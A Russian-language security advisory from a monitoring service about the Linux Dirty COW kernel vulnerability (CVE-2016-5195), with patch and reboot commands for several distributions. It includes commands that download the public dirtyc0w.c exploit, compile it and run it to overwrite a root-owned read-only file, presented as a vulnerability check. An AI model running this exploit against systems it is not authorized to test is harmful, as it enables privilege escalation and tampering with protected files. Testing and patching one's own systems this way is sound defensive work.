В ядре Linux обнаружена опасная уязвимость, которая связана с обработкой подсистемой памяти ядра механизма copy-on-write (COW). При эксплуатации уязвимости неавторизованный локальный пользователь сможет получить доступ к memory mappings с правом записи, хотя доступ должен быть ограничивать только чтением (read-only). Уязвимости присвоен номер CVE-2016-5195.
RHEL/CentOS Linux:
$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
$ bash rh-cve-2016-5195_1.sh
Другие дистрибутивы:
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Из под root'а:
$ sudo -s
# echo test text > foo
Из под пользователя:
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
Если у вас виртуальный хостинг, то устранять уязвимость должен ваш хостинг-провайдер. Обратитесь к нему и спросите устранил ли он эту уязвимость. Если у вас свой собственный сервер (или VPS), то вам необходимо самостоятельно выполнить обновление дистрибутива:
Debian/Ubuntu Linux
$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
$ sudo reboot
RHEL / CentOS Linux 5.x/6.x/7.x
$ sudo yum update
$ sudo reboot
RHEL / CentOS Linux 4.x
$ sudo up2date -u
$ sudo reboot
Suse Enterprise Linux or Opensuse Linux
# zypper patch
# reboot
Отметим, что Monitorus следит за угрозами безопасности сайтов и уведомляет своих клиентов о найденных уязвимостях и способах их устранения. Бесплатно добавьте свой сайт на контроль и вы всегда будете получать информацию о его доступности и безопасности.
О том, что мы будем делать с вашим сайтом - читайте здесь и здесь.
Все функции будут подключены к вашему сайту уже через несколько минут!
Добавляя свой сайт вы подтверждаете, что ознакомились и согласны с Лицензионным договоромВы так же можете бесплатно подписаться на Дайджест безопасности, заполнив форму ниже. Мы будем уведомлять вас обо всех уязвимостях, которые будут находиться в дальнейшем: о том, как проверить свой сайт/сервер и исправить ту или иную уязвимость.
2013-2024 © ООО "Интернет Технологии"
Не является рекламой и публичной офертой. Информация носит справочный характер.